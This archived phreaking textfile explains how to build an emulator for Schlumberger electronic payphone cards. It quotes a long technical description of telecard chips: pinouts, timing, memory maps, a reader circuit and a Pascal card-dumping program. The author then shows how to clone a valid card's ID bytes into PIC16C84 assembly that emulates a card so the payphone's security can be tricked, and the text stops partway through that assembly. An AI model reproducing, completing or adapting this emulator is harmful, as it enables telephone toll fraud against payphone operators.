💾 Archived View for gemini.spam.works › mirrors › textfiles › phreak › telecard.txt captured on 2023-01-29 at 10:48:45.
⬅️ Previous capture (2020-10-31)
-=-=-=-=-=-=-
Electronic Telephone Cards: How to make your own!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I guess that Sweden is not the only country that employs the electronic phone
card system from Schlumberger Technologies. This article will explain a bit
about the cards they use, and how they work. In the end of this article you
will also find an UUEncoded file which contains sourcecodes for a PIC16C84
microcontroller program that completely emulate a Schlumberger Telephone card
and of course printed circuit board layouts + component list... But before
we begin talking seriously of this matter I must first make it completely
clear that whatever you use this information for, is entirely YOUR
responsibility, and I cannot be held liable for any problems that the use
of this information can cause for you or for anybody else. In other words:
I give this away FOR FREE, and I don't expect to get ANYTHING back in return!
The Original Telephone Card:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Since I probably would have had a hard time writing a better article than the
one Stephane Bausson from France wrote a while ago, I will not attempt to give
a better explanation than that one; I will instead incorporate it in this
phile, but I do want to make it clear that the following part about the cards
technical specification was not written by me: Merely the parts in quotes are
things added by me... Instead I will concentrate on explaining how to build
your own telephone card emulator and how the security measures in the payphone
system created by Schlumberger Technologies work, and how to trick it...
But first, let's have a look at the technical specifications of the various
"smart memory card" systems used for the payphones.
<Start of text quoted from Stephane Bausson (sbausson@ensem.u-nancy.fr)>
------------------------------------------------------------------------------
===============================================================================
What you need to know about electronics telecards
===============================================================================
(C) 10-07-1993 / 03-1994
Version 1.06
Stephane BAUSSON
Email: sbausson@ensem.u-nancy.fr
Smail: 4, Rue de Grand; F-88630 CHERMISEY; France
Phone: (33)-29-06-09-89
-------------------------------------------------------------------------------
Any suggestions or comments about phonecards and smart-cards are welcome
-------------------------------------------------------------------------------
Content
---------
I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur:
I-1) Introduction:
I-2) SCHEMATICS of the chip:
I-3) PINOUT of the connector:
I-4) Main features:
I-5) TIME DIAGRAMS:
I-6) Memory MAP of cards from France and Monaco:
I-5) Memory MAP of cards from other countries:
II ) The cards from ODS: (German cards)
II-1) Introduction:
II-2) Pinout:
II-3) Main features:
II-4) Time Diagrams:
II-5) Memory Map:
II-6) Electrical features:
III) The Reader Schematic:
IV) The program:
-------------------------------------------------------------------------------
I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)
======================================================================
I-1) Introduction:
------------
You must not think that the electronics phone-cards are completly secret
things, and that you can not read the informations that are inside. It is quite
false, since in fact an electronic phonecard does not contain any secret
information like credit cards, and an electronic phonecard is nothing else that
an 256 bits EPROM, with serial output.
Besides do not think that you are going to refilled them when you will
have understood how they work, since for that you should reset the 256 bits of
the cards by erasing the whole card. But the chip is coated in UV opaqued resin
even if sometime you can see it as tranparent! Even if you were smart enough to
erase the 256 bits of the card you should program the manufactuer area, but
this is quite imposible since these first 96 bits are writing protected by a
lock-out fuse that is fused after the card programing in factory.
Neithertheless it can be very interesting to study how these cards work, to
see which kind of data are inside and how the data are maped inside or to see
how many units are left inside for exemple. Besides there are a great number of
applications of these cards when there are used (only for personal usage of
course) , since you can use them as key to open a door, or you can also use them as
key to secure a program, etc ....
These Telecards have been created in 1984 and at this time constructors
decided to build these cards in NMOS technology but now, they plan to change by
1994 all readers in the public to booths and use CMOS technology. Also they
plan to use EEPROM to secure the cards and to add many usefull infornations in,
and you will perhaps use phone cards to buy you bread or any thing else.
These cards are called Second Generation Telecards.
I-2) SCHEMATICS of the chip:
----------------------
.-------------------.
| |
--|> Clk |
| _ |
--| R/W |
| |
--| Reset |
| |
--| Fuse |
| |
--| Vpp |
| |
| |
'-. .-'
| |
.-------------------.
| Out |-- serial output
'-------------------'
I-3) PINOUT of the connector:
-------------------------
AFNOR CHIP ISO CHIP
---------- --------
-------------+------------- -------------+-------------
| 8 | 4 | | 1 | 5 |
| | | | | |
+-------\ | /-------+ +-------\ | /-------+
| 7 +----+----+ 3 | | 2 +----+ + 6 |
| | | | | | | |
+--------| |--------+ +--------| |--------+
| 6 | | 2 | | 3 | | 7 |
| + +----+ | | +----+----+ |
+-------/ | \-------+ +-------/ | \-------+
| 5 | 1 | | 4 | 8 |
| | | | | |
-------------+------------- -------------+-------------
NB: only the position of the chip is ISO
standardized and not the pinout
PINOUT: 1 : Vcc = 5V 5 : Gnd
------ 2 : R/W 6 : Vpp = 21V
3 : Clock 7 : I/O
4 : Reset 8 : Fuse
I-4) Main features:
---------------
- Synchronous protocol.
- N-MOS technology.
- 256x1 bit organisation.
- 96 written protected by a lock-out fuse.
- Low power 85mW in read mode.
- 21 V programming voltage.
- Access time: 500ns
- Operating range: -10?C +70?C
- Ten year data rentention.
I-5) TIME DIAGRAMS:
---------------
+21V _____________
+5V ____________________________________| |_________________ Vpp
: :
+5V ___________________:_____________:_________________ Reset
0V ________________| : :
: : :
+5V ____ : ____ : ______:______
0V ___| |_______:_____| |________:______| : |__________ Clock
: : : : : : : : :
+5V : : : : : :______:______: : _
0V ___:____:_______:_____:____:________| : |______:__________ R/W
: : : : : : : : :
+5V : : :_____: :________: : : :__________
0V XXXXXXXXXXXXXXXXX_____XXXXXX________XXXXXXXXXXXXXXXXXXXXXX__________ Out
: : : : : :<-----><---->: :
: : : : : :10 to 10 to :
: : : : : :50 ms 50ms :
Reset Bit 1 Bit2 Bit 3
card reading reading Bit2 writing to 1 reading
I-6) MEMORY MAP of cards from France and Monaco:
--------------------------------------------
Bytes Bits Binary Hexa
+-----------+-----+
1 1 --> 8 | | | ---> Builder code.
+-----------+-----+
2 9 --> 16 | 0000 0011 | $03 | ---> a french telecard
+-----------+-----+
3 17 --> 24 | | |
+-----------+-----+
4 25 --> 32 | | |
+-----------+-----+
5 33 --> 40 | | |
+-----------+-----+
6 41 --> 48 | | |
+-----------+-----+
7 49 --> 56 | | |
+-----------+-----+
8 57 --> 64 | | |
+-----------+-----+
9 65 --> 72 | | |
+-----------+-----+
10 73 --> 80 | | |
+-----------+-----+
11 81 --> 88 | | |
+-----------+-----+
12 33 --> 40 | 0001 0011 | $13 | ---> 120 units card
| 0000 0110 | $06 | ---> 50 units card
| 0000 0101 | $05 | ---> 40 units card
+-----------+-----+
13-31 97 --> 248 | | | ---> The units area: each time a unit
| | | is used, then a bit is set to "1";
| | | Generaly the first ten units are
| | | fused in factory as test.
| | |
| | |
| | |
+-----------+-----+
32 249 --> 256 | 1111 1111 | $FF | ---> the card is empty
+-----------+-----+
I-7) MEMORY MAP of the other cards:
-------------------------------
Bytes Bits Binary Hexa
+-----------+-----+
1 1 --> 8 | | |
+-----------+-----+
2 9 --> 16 | 1000 0011 | $83 | ---> a telecard
+-----------+-----+-----------+-----+
3-4 17 --> 32 | 1000 0000 | $80 | 0001 0010 | $12 | ---> 10 units card
| | | 0010 0100 | $24 | ---> 22 units card
| | | 0010 0111 | $27 | ---> 25 units card
| | | 0011 0010 | $32 | ---> 30 units card
| | | 0101 0010 | $52 | ---> 50 units card
| | | 1000 0010 | $82 | ---> 80 units card
| 1000 0001 | $81 | 0000 0010 | $02 | ---> 100 untis card
| | | 0101 0010 | $52 | ---> 150 units card
+-----------+-----+-----------+-----+
5 33 --> 40 | | |
+-----------+-----+
6 41 --> 48 | | |
+-----------+-----+
7 49 --> 56 | | |
+-----------+-----+
8 57 --> 64 | | |
+-----------+-----+
9 65 --> 72 | | |
+-----------+-----+
10 73 --> 80 | | |
+-----------+-----+
11 81 --> 88 | | |
+-----------+-----+
12 89 --> 96 | 0001 1110 | $1E | ---> Sweden
| 0010 0010 | $22 | ---> Spain
| 0011 0000 | $30 | ---> Norway
| 0011 0011 | $33 | ---> Andorra
| 0011 1100 | $3C | ---> Ireland
| 0100 0111 | $47 | ---> Portugal
| 0101 0101 | $55 | ---> Czech Republic
| 0101 1111 | $5F | ---> Gabon
| 0110 0101 | $65 | ---> Finland
+-----------+-----+
13-31 97 --> 248 | | | ---> The units area: each time a unit
| | | is used, then a bit is set to "1";
| | |
| | | Generaly the first two units are
| | | fused in factory as test.
| | |
| | |
+-----------+-----+
32 249 --> 256 | 0000 0000 | $00 |
+-----------+-----+
II ) The cards from ODS, Giesecke & Devrient, ORGA Karten systeme,
=============================================================
Uniqua, Gemplus, Schlumberger and Oldenbourg Kartensysteme:
===========================================================
II-1) Introduction:
------------
These cards are in fact 128 bit memory in NMOS technology, and the
map of these cards are the following:
64 bit EPROM written protected (manufaturer area).
40 bit EEPROM (5x8 bits).
24 bits set to "1".
II-2) Pinout:
--------
ISO 7816-2
-------------+-------------
| 1 | 5 | Pinout:
| | | -------
+-------\ | /-------+
| 2 +----+ + 6 | 1 : Vcc = 5V 5 : Gnd
| | | | 2 : Reset 6 : n.c.
+--------| |--------+ 3 : Clock 7 : I/O
| 3 | | 7 | 4 : n.c. 8 : n.c.
| +----+----+ |
+-------/ | \-------+ n.c. : not connected
| 4 | 8 |
| | |
-------------+-------------
II-3) Main features:
---------------
- ISO 7816- 1/2 compatible.
- use a single 5V power supply.
- low power consuption.
- NMOS technology.
II-4) Time Diagrams:
----------------
Reset:
------
The address counter is reset to 0 when the clock line CLK is raised while
the control line R is high. Note that the address counter can not be reset
when it is in the range 0 to 7.
__________________
_____| |_____________________________________________ Reset
: :
: _____ : _____ _____ _____ _____
_____:_______| |____:_| |_____| |_____| |_____| |_ Clk
: : : : : : : : : : :
_____:_______:__________:_:_____:_____:_____:_____:_____:_____:_____:_
_____:___n___|_____0____:_|_____1_____|_____2_____|_____3_____|___4_:_ (Address)
: : : : : :
_____: :_______:___________:___________:___________:_
_____XXXXXXXXXXXXXXXXXXXX_______|___________|___________|___________|_ Data
Bit n Bit 0 Bit 1 Bit2 Bit3
The address counter is incremented by 1 with each rising edge of the clock
signal Clk, for as long as the control line R remains low. The data held in
each addressed bit is output to I/O contact each time Clk falls. It is not
impossible to decrement the address counter, therefore to address an earlier
bit, the address counter must be reset then incremented to require value.
Write:
------
All unwritten or erased bits in the address 64-104 may be unwritten to.
When a memory cell is unwritten to, it is set to 0. The addressed cell is
unwritten to by the following sequence.
1- R is raised while Clk is low, to disable address counter increment for one
clock pulse.
2- Clk is then raised for a minimum of 10ms to write to the address bit.
When to write operation ends, and Clk falls, the address counter is unlocked,
and the content of the written cell, which is now 0, is output to I/O contact
if the operation is correct.
The next Clk pulse will increment the address by one, then the write sequence
can be repeated to write the next bit.
_____ _____
_____________| |______________________________| |_______________ Reset
: :
___ : _____ ___ : _____
____| |____:__________| |_________| |_____:__________| |____ Clk
: : : : : : : : :
____:________:__________:_____:_________:___:_____:__________:_____:_____
n | n+1 | n+2 | : n+3 | : (Address)
----'--------:----------'-----:---------'---:-----:----------'-----:-----
: : : : : : :
_________ _: : : ____________: ___: : :
_________XXX_XXXXXXXXXXXXXXXXXXX____________ XX___XXXXXXXXXXXXXXXXXXXXXXX I/O
n n+1 : : n+1 n+2 : :
: : : :
write write
WriteCarry:
-----------
A counter is erased by performing the WRITECARRY sequence on the stage of
the next highest weighing to that to be erased.
The writecarry sequence is as follows:
1 - Set the address counter to an unwritten bit in the next highest counter
stage to that to be erased.
2 - Increment is disabled on the following rising edge of R where Clk remains
low.
3 - Clk is then raised for a minimum of 10ms, while R is low, to write to the
next address bit.
4 - R is the raised again while Clk remains low to disable increment a second
time.
5 - Clk is the raised for a minimum of 1ms, while R is low, to write to the
addressed bit a second time, erasing the counter level immediately below that
the addressed bit.
_____ _____
______| |____________________| |_________________________________ Rst
: :
: _______ : _______ ___
______:___________| |______:_____________| |______| |______ Clk
: : : : : : : :
: : : : : : : :
<------------------------- address n ------------------------>:<--- n+1 ------
: : : : : : :
: : : : : : :
______: : :______: : :__________: _____
______XXXXXXXXXXXXXXXXXXXXX______XXXXXXXXXXXXXXXXXXXXXXX__________XX_____ I/O
: : n : : n n+1
: : : :
Write Erase
II-5) Memory Map:
-------------
Bytes Bits Binary Hexa
+-----------+-----+
1 1 --> 8 | | |
+-----------+-----+
2 9 --> 16 | 0010 1111 | $2F | ---> Germany
| 0011 0111 | $37 | ---> Netherland
| 0011 1011 | $3B | ---> Greece
+-----------+-----+
3 17 --> 24 | | |
4 25 --> 32 | | | ---> Issuer area (written protected)
5 33 --> 40 | | |
6 41 --> 48 | | |
7 49 --> 56 | | |
8 57 --> 64 | | |
+-----------+-----+
9 65 --> 72 | | | ---> c4096 )
10 73 --> 80 | | | ---> c512 )
11 81 --> 88 | | | ---> c64 ) 5 stage octal counter
12 89 --> 96 | | | ---> c8 )
13 97 --> 104 | | | ---> c0 )
+-----------+-----+
14 105 --> 112 | 1111 1111 | $FF |
15 113 --> 120 | 1111 1111 | $FF | ---> area of bits set to "1"
16 120 --> 128 | 1111 1111 | $FF |
+-----------+-----+
The Issuer area:
----------------
This issuer consists of 40 bits. The contents of the issuer area are
specified by the card issuer, and are fixed during the manufacturing process.
The contents of the issuer area will include data such as serial numbers,
dates, and distribution centers.
This area may only be read.
The Counter area:
-----------------
The counter area stores the card's units. Its initial value is specified
by the card issuer and set during manufacturing.
The counter area is divided into a 5 stage abacus.
Note that you can only decrease the counter and it is not authorised to write
in the counter a value greater than the old value.
I-6) Electrical features:
--------------------
Maximum ratings:
----------------
+--------+------+------+------+
| Symbol | Min | Max | Unit |
+----------------------+--------+------+------+------+
| Supply voltage | Vcc | -0.3 | 6 | V |
+----------------------+--------+------+------+------+
| Input voltage | Vss | -0.3 | 6 | V |
+----------------------+--------+------+------+------+
| Storage temperature | Tstg | -20 | +55 | ?C |
+----------------------+--------+------+------+------+
| Power dissipassion | Pd | - | 50 | mW |
+----------------------+--------+------+------+------+
DC caracteristics:
------------------
+--------+-----+-----+-----+------+
| Symbol | Min.| Typ.| Max.| Unit |
+---------------------------+--------+-----+-----+-----+------+
| Suplly current | Icc | - | - | 5 | mA |
+---------------------------+--------+-----+-----+-----+------+
| Input Voltage (low) | Vl | 0 | - | 0.8 | V |
+---------------------------+--------+-----+-----+-----+------+
| Input voltage (high) | Vh | 3.5 | - | Vcc | V |
+---------------------------+--------+-----+-----+-----+------+
| Input current R | Ih | - | - | 100 | uA |
+---------------------------+--------+-----+-----+-----+------+
| Input current Clk | Il | - | - | 100 | uA |
+---------------------------+--------+-----+-----+-----+------+
| Output current (Vol=0.5V) | Iol | - | - | 10 | uA |
+---------------------------+--------+-----+-----+-----+------+
| Output current (Voh=5V) | Ioh | - | - | 0.5 | mA |
+---------------------------+--------+-----+-----+-----+------+
AC caracteristics:
------------------ +--------+------+------+------+
| Symbol | Min. | Max. | Unit |
+----------------------+--------+------+------+------+
| Pulse duration | tr | 50 | - | us |
| R address reset | | | | |
+----------------------+--------+------+------+------+
| Pulse duration | ts | 10 | - | us |
| R write | | | | |
+----------------------+--------+------+------+------+
| High level Clk | th | 8 | - | us |
+----------------------+--------+------+------+------+
| Low level Clk | tl | 12 | - | us |
+----------------------+--------+------+------+------+
| Write window | Twrite | 10 | - | ms |
+----------------------+--------+------+------+------+
| Erase window | Terase | 10 | - | ms |
+----------------------+--------+------+------+------+
| | tv1 | 5 | - | us |
+----------------------+--------+------+------+------+
| | tv2 | 3.5 | - | us |
+----------------------+--------+------+------+------+
| | tv3 | 3.5 | - | us |
+----------------------+--------+------+------+------+
| | tv4 | 3.5 | - | us |
+----------------------+--------+------+------+------+
| | tv5 | 3.5 | - | us |
+----------------------+--------+------+------+------+
| | tv6 | 5 | - | us |
+----------------------+--------+------+------+------+
| | tv7 | 5 | - | us |
+----------------------+--------+------+------+------+
| | tv8 | 10 | - | us |
+----------------------+--------+------+------+------+
III) The Reader Schematic:
======================
External 5V (Optional)
5V o------,
| / T2 PNP d13 r7 10
0V o--, | / BC 177 |\ | _____
| | ,-------o/ o--*------. E C .--| >+-[_____]--------,
__+__ | | | \ / |/ | |
\\\\\ | __|__ Batery | \ / |
| - 22.5V | --------- |
....... | | | _____ | _____ |
: | __+__ +--[_____]--*--[_____]--, |
D2 : | \\\\\ r6 150k r5 15k | |
4 o-------|---------------------------*------------------|-------------, |
: | | r3 220k / C | |
Ack : | | _____ |/ T1 - NPN | |
10 o------|--------. '--[_____]-*---| BC107 | |
: | | _____ | |\ | |
: ,-, ,-, +--[_____]-' \ E | |
: | |r2 | |r1 | r4 390k | | |
: | |220 | |22k __+__ __+__ | |
: |_| |_| \\\\\ \\\\\ | |
: | |\ | | | |
: *--| >+--|----------------*----------------------------------|--*
: | |/ | | ,-----|-----------------------------, | |
: | d1 | | | ,----------,----------, | | |
: | | | *---|--* Fuse | Reset *--|---' | |
: | | | | |----------|----------| | |
D0 : | | | ,-|---|--* I/O | Clk *--|---, | |
2 o-------|--------|----------' | | |----------|----------| | | |
: | | | '---|--* Vpp | R/W *--|---|----' |
Busy : | | | |----------|----------| | |
11 o------|--------|--------------' ,---|--* Gnd | 5V * | | |
: | | | '----------'-------|--' | |
D1 : | | __+__ Chip connector | | |
3 o-------|--------|--------, \\\\\ | | |
: | | '------------------------------|------' |
Str : | |\ | | | |
1 o-------*--| >+--*----*----*----*----*-------------------' |
: d2|/ | |d3 |d4 |d5 |d6 |d7 |
: -+- -+- -+- -+- -+- |
: /_\ /_\ /_\ /_\ /_\ |
D3 : | | | | | |\ | d8 |
5 o----------------*----|----|----|----|---| >+-------*-------------------'
: | | | | |/ | |
: | | | | |
D4 : | | | | |\ | d9 |
6 o---------------------*----|----|----|---| >+-------*
: | | | |/ | |
: | | | |
D5 : | | | |\ | d10 |
7 o--------------------------*----|----|---| >+-------*
: | | |/ | |
: | | |
D6 : | | |\ | d11 |
8 o-------------------------------*----|---| >+-------*
: | |/ | |
: | |
D7 : | |\ | d12 |
9 o------------------------------------*---| >+-------'
: |/ |
:
:
25 o------.
: |
.......: | d1 to d13: 1N4148
__+__
\\\\\
Centronic port
IV) The program:
===========
The following program will enable you to read telecards on you PC if you
build the precedent reader.
--------------- cut here (begin)
{*****************************************************************************}
{ T E L E C A R D . PAS }
{*****************************************************************************}
{ This program enable you to dumb the memory of electronics phonecards }
{ from all over the world, so that you will be able to see which country }
{ the card is from how many units are left and so on .... }
{*****************************************************************************}
{ }
{ Written by Stephane BAUSSON (1993) }
{ }
{ Email: sbausson@ensem.u-nancy.fr }
{ }
{ Snail Mail Address: 4, Rue de Grand }
{ F-88630 CHERMISEY }
{ France }
{ }
{*****************************************************************************}
{* Thanks to: Tomi Engdahl (Tomi.Engdahl@hut.fi) *}
{*****************************************************************************}
USES crt,dos;
CONST port_address=$378; { lpr1 chosen }
TYPE string8=string[8];
string2=string[2];
VAR reg : registers;
i,j : integer;
Data : array[1..32] of byte;
car : char;
byte_number : integer;
displaying : char;
{-----------------------------------------------------------------------------}
PROCEDURE Send(b:byte);
BEGIN port[port_address]:=b;
END;
{-----------------------------------------------------------------------------}
FUNCTION Get:byte;
BEGIN get:=port[port_address+1];
END;
{-----------------------------------------------------------------------------}
{ FUNCTION dec2hexa_one(decimal_value):hexa_character_representation; }
{ }
{ - convert a 4 bit long decimal number to hexadecimal. }
{-----------------------------------------------------------------------------}
FUNCTION dec2hexa_one(value:byte):char;
BEGIN case value of
0..9 : dec2hexa_one:=chr(value+$30);
10..15 : dec2hexa_one:=chr(value+$37);
END;
END;
{-----------------------------------------------------------------------------}
{ FUNCTION d2h(decimal_byte):string2; }
{ }
{ - convert a decimal byte to its hexadecimal representation. }
{-----------------------------------------------------------------------------}
FUNCTION d2h(value:byte):string2;
VAR msbb,lsbb:byte;
BEGIN msbb:=0;
if ( value >= $80 ) then
BEGIN msbb:=msbb+8;
value:=value-$80;
END;
if ( value >= $40 ) then
BEGIN msbb:=msbb+4;
value:=value-$40;
END;
if ( value >= $20 ) then
BEGIN msbb:=msbb+2;
value:=value-$20;
END;
if ( value >= $10 ) then
BEGIN msbb:=msbb+1;
value:=value-$10;
END;
lsbb:=0;
if ( value >= $08 ) then
BEGIN lsbb:=lsbb+8;
value:=value-$08;
END;
if ( value >= $04 ) then
BEGIN lsbb:=lsbb+4;
value:=value-$04;
END;
if ( value >= $02 ) then
BEGIN lsbb:=lsbb+2;
value:=value-$02;
END;
if ( value >= $01 ) then
BEGIN lsbb:=lsbb+1;
value:=value-$01;
END;
d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb);
END;
{-----------------------------------------------------------------------------}
Function Binary( b : byte):string8;
var weigth : byte;
s : string8;
BEGIN weigth:=$80;
s:='';
while (weigth > 0) do
BEGIN if ((b and weigth) = weigth) then s:=s+'1'
else s:=s+'0';
weigth:=weigth div $02;
END;
Binary:=s;
END;
{-----------------------------------------------------------------------------}
FUNCTION Units:byte;
VAR u, i : integer;
s : string8;
BEGIN u:=0;
i:=13;
while (Data[i] = $FF) do
BEGIN u:=u+8;
i:=i+1;
END;
s:=Binary(Data[i]);
while(s[1]='1') do
BEGIN inc(u);
s:=copy(s,2,length(s));
END;
units:=u;
END;
{-----------------------------------------------------------------------------}
function Units_2:LongInt;
BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13];
END;
{-----------------------------------------------------------------------------}
PROCEDURE Card_Type;
BEGIN case Data[2] of
$03: BEGIN write('Telecard - France - ');
case Data[12] of
$13: write('120 Units - ',units-130,' Units left');
$06: write('50 Units - ',units-60,' Units left');
$15: write('40 Units - ',units-40,' Units left');
END;
END;
$2F:BEGIN write('Telecard - Germany - ', Units_2, ' Units left');
END;
$3B:BEGIN write('Telecard - Greece - ', Units_2, ' Units left');
END;
$83:BEGIN write('Telecard');
case Data[12] of
$1E: write(' - Sweden');
$30: write(' - Norway');
$33: write(' - Andorra');
$3C: write(' - Ireland');
$47: write(' - Portugal');
$55: write(' - Czech Republic');
$5F: write(' - Gabon');
$65: write(' - Finland');
END;
if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then
BEGIN case ((Data[3] and $0F)*$100+Data[4]) of
$012: write (' - 10 Units - ',units-12,' Units left');
$024: write (' - 22 Units - ',units-24,' Units left');
$027: write (' - 25 Units - ',units-27,' Units left');
$032: write (' - 30 Units - ',units-32,' Units left');
$052: write (' - 50 Units - ',units-52,' Units left');
$067: write (' - 65 Units - ',units-62,' Units left');
$070: write (' - 70 Units - ',units-70,' Units left');
$102: write (' - 100 Units - ',units-102,' Units left');
$152: write (' - 150 Units - ',units-152,' Units left');
END;
END;
{ write(' - N? ',Data[5]*$100+Data[6]);}
END;
END;
END;
{-----------------------------------------------------------------------------}
PROCEDURE waiting;
BEGIN send($00);
write('Enter a card in the reader and press a key ...');
repeat until keypressed;
gotoxy(1, wherey);
clreol;
END;
{-----------------------------------------------------------------------------}
PROCEDURE Full_Displaying;
BEGIN writeln('Memory dump:');
for i:=1 to 80 do write('-');
for i:=1 to (byte_number div 6 + 1) do
BEGIN for j:=1 to 6 do
BEGIN if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9);
END;
gotoxy(60,wherey);
for j:=1 to 6 do
if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ');
writeln;
END;
for i:=1 to 80 do write('-');
Card_Type;
writeln;
END;
{-----------------------------------------------------------------------------}
PROCEDURE Short_Displaying;
VAR j : integer;
BEGIN for j:=1 to byte_number do
BEGIN write(d2h(Data[j]),' ');
END;
writeln;
END;
{-----------------------------------------------------------------------------}
PROCEDURE Reading;
VAR i, j : integer;
Value : byte;
BEGIN send($FE);
send($F8);
for i:=1 to 32 do
BEGIN Value:=0;
for j:=1 to 8 do
BEGIN Value:=Value*$02 + ((get and $08) div $08);
send($FB);
delay(1);
send($F8);
END;
Data[i]:=Value;
END;
case displaying of
'F':full_displaying;
'S':short_displaying;
END;
END;
{-----------------------------------------------------------------------------}
PROCEDURE writting;
VAR i,n:integer;
car:char;
BEGIN write('Which bit do you want to set to "1" : ');
readln(n);
waiting;
car:=readkey;
send($FA);
send($F8);
for i:=1 to n do
BEGIN send($F9);
if i=n then
BEGIN send($FD);
delay(20);
send($FF);
delay(20);
END;
send($FB);
END;
reading;
END;
{-----------------------------------------------------------------------------}
PROCEDURE Saving;
VAR filename : string;
f : text;
i : word;
BEGIN write('Enter the filename: ');
readln(filename);
assign(f, filename);
rewrite(f);
for i:=1 to byte_number do write(f,d2h(Data[i]),' ');
close(f);
END;
{-----------------------------------------------------------------------------}
PROCEDURE initialize;
VAR i : integer;
BEGIN byte_number:=32;
displaying:='F';
clrscr;
writeln(' 1 - to dump a 256 bits card');
writeln(' 2 - to dump a 128 bits card');
writeln(' F - to display in full format');
window(41,1,80,25);
writeln(' S - to display in short format');
writeln(' F2 - to save in a file');
writeln(' Q - to exit the program');
window(1,4,80,25);
for i:=1 to 80 do write('=');
window(1,5,80,25);
END;
{=============================================================================}
BEGIN initialize;
repeat waiting;
car:=upcase(readkey);
case car of
'W':writting;
'Q':;
'1':byte_number:=32;
'2':byte_number:=16;
'F','S':displaying:=car;
#00: BEGIN car:=readkey;
if car=#60 then saving;
END;
else reading;
END;
until car='Q';
END.
--------------- cut here (end)
_/_/_/_/_/ Stephane BAUSSON
_/_/_/_/_/ Engineering student at ENSEM (Nancy - France)
_/_/_/_/_/ Smail: 4, Rue de Grand, F-88630 CHERMISEY, France
_/_/_/_/_/
_/_/_/_/_/ Email: sbausson@ensem.u-nancy.fr
------------------------------------------------------------------------------
<End of text quoted from Stephane Bausson's text about the telephone cards>.
The Program:
~~~~~~~~~~~~
Well, when I saw this phile about the cards the first time, about a year ago
I quickly realized that this system is very unsecure and really needs to be
hacked. So, now I present you with a piece of software for the PIC 16C84 RISC
microcontroller from Microchip that will take care of emulating the cards
used by Schlumberger and others. This system is to be found in Scandinavia
(Sweden, Norway and Finland), Spain, France and other countries. I do know
that France probably needs some small modifications for this to work, but I
see no reason to as why it shouldn't do so! For this to work, you need to
have access to a PROM burner which can handle the PIC 16C84, or you might
just build one yourself as I include some plans for that in the UUEncoded
block to be found at the end of this phile. First of all, you have to read
off the first 12 bytes of data from a valid card from the country you wish
your emulator to work in. This because I don't think it would be a good idea
to publish stolen card identities in Phrack. Then you simply enter those 12
bytes of data in the proper place in my program and compile it. That's it...
And since I happen to choose a version of the PIC with internal Data EEPROM,
that means that the first 12 locations of the Data EEPROM should contain the
card id bytes. As of today this code should work smooth and fine, but maybe
you'll need to modify it later on when Schlumberger gets tired of my hack.
But since the PIC is a very fast and powerful microcontroller it might be
quite hard for them to come up with a solution to this problem. Let's have
a look at the PIC Software! (Note that the current version of Microchip's
PICSTART 16B package is unable to program the DATA EEPROM array in the 16C84
so if you are going to use that one, use the other version of the source code
which you'll find in the UUEncoded part!).
<Start of TELECARD.ASM>.
==============================================================================
TITLE "ISO 7816 Synchronous Memory Card Emulator"
LIST P=PIC16C84, R=HEX
INCLUDE "PICREG.EQU"
; PIC16C84 I/O Pin Assignment List
CRD_CLK equ 0 ; RB0 + RA4 = Card Clock
CRD_DTA equ 0 ; RA0 = Card Data Output
CRD_RST equ 1 ; RB1 = Card Reset, Low-Active
CRD_WE equ 7 ; RB7 = Card Write-Enable, Hi-Active
; PIC16C84 RAM Register Assignments
CRD_ID equ 0x00c ; Smartcard ID, 12 bytes
FUSCNT equ 0x018 ; Fused units counter
BITCNT equ 0x019 ; Bitcounter
LOOPCNT equ 0x01a ; Loop Counter
EE_FLAG equ 0x01b ; EEPROM Write Flag
TEMP1 equ 0x01c ; Temporary Storage #1
TEMP2 equ 0x01d ; Temporary Storage #2
TEMP3 equ 0x01e ; Temporary Storage #3
TEMP4 equ 0x01f ; Temporary Storage #4
TEMP_W equ 0x02e ; Temporary W Save Address
TEMP_S equ 0x02f ; Temporary STATUS Save Address
org 0x2000 ; Chip ID Data
dw 042,042,042,042
org 0x2007 ; Configuration Fuses
dw B'00000001'
org 0x2100 ; Internal Data EEPROM Memory (Card ID!!!)
db 0x081,0x042,0x000,0x011,0x022,0x033
db 0x044,0x055,0x066,0x077,0x011,0x084
db 0x002 ; Default used up credits value
org PIC84 ; Reset-vector
goto INIT ; Jump to initialization routine
org INTVEC ; Interupt-vector
push ; Save registers
call INTMAIN ; Call main interupt routine
pop ; Restore registers
retfie ; return from interupt & clear flag
org 0x010 ; Start address for init rout.
INIT bsf STATUS,RP0 ; Access register bank 1
clrwdt ; Clear watchdog timer
movlw B'11101000' ; OPTION reg. settings
movwf OPTION ; Store in OPTION register
movlw B'11111110' ; Set PORT A Tristate Latches
movwf TRISA ; Store in PORT A tristate register
movlw B'11111111' ; Set PORT B Tristate Latches
movwf TRISB ; Store in PORT B tristate register
bcf STATUS,RP0 ; Access register bank 0
clrf RTCC ; Clear RTCC
clrf PORTA ; Clear PORTA
clrf PORTB ; Clear PORTB
movlw 0d ; 13 bytes to copy
movwf LOOPCNT ; Store in LOOPCNT
movlw 0c ; Start storing at $0c in RAM
movwf FSR ; Store in FSR
clrf EEADR ; Start at EEPROM Address 0
EECOPY
bsf STATUS,RP0 ; Access register bank 1
bsf EECON1,RD ; Set EECON1 Read Data Flag
bcf STATUS,RP0 ; Access register bank 0
movfw EEDATA ; Read one byte of EEPROM Data
movwf INDIR ; Store in RAM pointed at by FSR
incf FSR ; Increase FSR pointer
incf EEADR ; Increase EEPROM Address Pointer
decfsz LOOPCNT,1 ; Decrease LOOPCNT until it's 0
goto EECOPY ; Go and get some more bytes!
bsf STATUS,RP0 ; Access register bank 1
bcf EECON1,EEIF ; Clear EEPROM Write Int. Flag
bcf EECON1,WREN ; EEPROM Write Disable
bcf STATUS,RP0 ; Access register bank 0
movlw B'10010000' ; Enable INT Interupt
movwf INTCON ; Store in INTCON
MAIN bsf STATUS,RP0 ; Access register bank 1
btfsc EECON1,WR ; Check if EEPROM Write Flag Set
goto MAIN ; Skip if EEPROM Write is Completed
bcf EECON1,EEIF ; Reset Write Completion Flag
bcf EECON1,WREN ; EEPROM Write Disable
bcf STATUS,RP0 ; Access register bank 0
